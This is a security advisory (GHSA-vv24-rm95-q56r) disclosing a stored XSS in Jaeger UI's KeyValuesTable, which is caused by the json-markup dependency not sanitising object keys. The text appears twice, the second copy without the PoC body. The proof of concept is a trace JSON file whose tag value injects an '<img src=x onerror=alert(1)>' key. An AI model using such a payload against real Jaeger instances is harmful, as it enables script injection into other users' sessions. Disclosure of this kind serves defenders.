Related UI vulnerability advisory: GHSA-vv24-rm95-q56r
Summary
Jaeger UI is using the json-markup
dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the KeyValuesTable
is vulnerable to XSS.
Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
PoC
- Start a Jaeger UI
- Save the following trace as a file:
{
"data": [
{
"traceID": "076ef819cc06c45a",
"spans": [
{
"traceID": "076ef819cc06c45a",
"spanID": "076ef819cc06c45a",
"flags": 1,
"operationName": "and open 'attributes'",
"references": [],
"startTime": 1678196149232010,
"duration": 13485,
"tags": [
{
"key": "sampler.type",
"type": "string",
"value": "{\"<img src=x onerror=alert(1)>\":\"test\"}"
}
],
"logs": [],
"processID": "p1",
"warnings": null
}
],
"processes": {
"p1": {
"serviceName": "click here",
"tags": [
]
}
},
"warnings": null
}
],
"total": 0,
"limit": 0,
"offset": 0,
"errors": null
}
- Upload that trace to Jaeger UI in order to visualise it.
- Open the trace, open it's span's attributes.
- XSS should be fired.
Impact
This is a XSS on Jaeger UI. XSS can be used to run JavaScript.
Related UI vulnerability advisory: GHSA-vv24-rm95-q56r
Summary
Jaeger UI is using the
json-markup
dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus theKeyValuesTable
is vulnerable to XSS.Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
PoC
Impact
This is a XSS on Jaeger UI. XSS can be used to run JavaScript.